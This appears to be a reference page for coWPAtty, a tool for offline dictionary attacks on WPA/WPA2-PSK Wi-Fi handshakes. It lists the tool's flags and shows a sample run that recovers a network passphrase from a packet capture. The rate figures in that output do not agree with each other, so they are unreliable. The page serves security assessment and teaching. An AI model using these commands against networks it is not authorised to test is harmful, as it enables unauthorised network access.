coWPAtty is an Implementation of an offline dictionary attack against WPA/WPA2 networks using PSK-based authentication (e.g. WPA-Personal). Many enterprise networks deploy PSK-based authentication mechanisms for WPA/WPA2 since it is much easier than establishing the necessary RADIUS, supplicant and certificate authority architecture needed for WPA-Enterprise authentication. Cowpatty can implement an accelerated attack if a precomputed PMK file is available for the SSID that is being assessed.
-f Dictionary file -d Hash file (genpmk) -r Packet capture file -s Network SSID (enclose in quotes if SSID includes spaces) -2 Use frames 1 and 2 or 2 and 3 for key attack (nonstrict mode) -c Check for valid 4-way frames, does not crack -h Print this help information and exit -v Print verbose information (more -v for more verbosity) -V Print program version and exit
cyborg@cyborg:~$ cowpatty -f dict.txt -r packetscap-02.cap -s tempztrela cowpatty 4.6 - WPA-PSK dictionary attack. <[email protected]> Collected all necessary data to mount crack against WPA2/PSK passphrase. Starting dictionary attack. Please be patient. The PSK is "trendztrela". 1501 passphrases tested in 0.01 seconds: 129.32 passphrases/second